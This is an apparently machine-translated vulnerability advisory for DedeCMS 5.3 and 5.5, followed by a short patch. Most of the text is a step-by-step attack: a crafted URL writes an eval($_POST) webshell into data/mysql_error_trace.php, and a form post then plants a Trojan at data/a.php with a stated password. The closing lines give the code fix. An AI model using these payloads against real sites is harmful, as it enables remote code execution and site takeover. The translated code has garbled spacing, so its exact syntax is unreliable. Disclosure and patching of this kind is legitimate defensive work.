Major injection vulnerabilities in dedecms5.3 and 5.5 versions,

Author: Zhang Heng
Assume that the domain name is www.abc.com. The attack steps are as follows:
1. visit the website:
Http://www.abc.com/plus/digg_frame.php? Action = good & id = 1024% 651024 & mid = */eval ($ _ POST [x]); var_dump (3);?>

2. Access the http://www.abc.com/data/mysql_error_trace.php to see the following information to prove that the injection was successful.
Int (3) Error: Illegal double '1024e1024' value found during parsing
Error SQL: Select goodpost, badpost, scores From 'gxeduw _ archives 'where id = 1024e1024 limit 0, 1; */?>

3.execute the file test.html In the compressed package. Note that the action address in form is:
<Form action = "http://www.abc.com/data/mysql_error_trace.php" enctype = "application/x-www-form-urlencoded" method = "post">
After confirmation, the information shown in step 2nd indicates that the file Trojan is successfully uploaded.
Trojan URL: http://www.abc.com/data/a.php
Password 2006888
Vulnerability Analysis:
MySQL field value overflow causes errors and DEDECMS uses PHP to record database error information and the file header is not verified.
Solution:
Open the File include/dedesql. class. php
Find code
@ Fwrite ($ fp, '<''.'? Php '. "/* {$ savemsg }*/? "."> ");
Replacement Code
@ Fwrite ($ fp, '<'.'? Php '. "exit;/* {$ savemsg }*/? "."> ");
Clear data/mysql_error_trace.php File Content